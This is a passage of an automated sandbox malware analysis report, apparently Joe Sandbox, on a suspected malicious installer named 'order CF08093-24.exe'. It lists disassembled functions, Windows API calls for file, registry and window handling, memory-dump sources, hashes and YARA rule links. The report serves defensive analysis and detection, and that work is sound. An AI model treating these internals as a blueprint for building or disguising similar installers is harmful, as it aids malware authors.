                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                            • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                            • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                            • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                            Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                            • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                            • wsprintfA.USER32 ref: 00406206
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                            • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                            • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                            • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                            Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\order CF08093-24.exe", xrefs: 00406833
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                                                            • *?|<>/":, xrefs: 00406841
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2118705056
                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                            • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                            • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                            Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                            • GetSysColor.USER32(00000000), ref: 00404582
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                            • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                            • GetSysColor.USER32(?), ref: 004045AD
                                                                            • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                            • DeleteObject.GDI32(?), ref: 004045D7
                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                            Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                              • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                            • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                            • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                            • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                            Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                            • GetMessagePos.USER32 ref: 00404E9E
                                                                            • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                            • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                            • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                            Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E76
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Calibri
                                                                            • API String ID: 3808545654-1409258342
                                                                            • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                            • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                            • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                            • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                            Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                            • MulDiv.KERNEL32(000C216B,00000064,000C216F), ref: 00403001
                                                                            • wsprintfW.USER32 ref: 00403011
                                                                            • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 0040300B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                            • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                            • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                            • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                            Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                            • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                            • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                            • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                            • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                            Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                            • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                            • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                            • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                                            Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
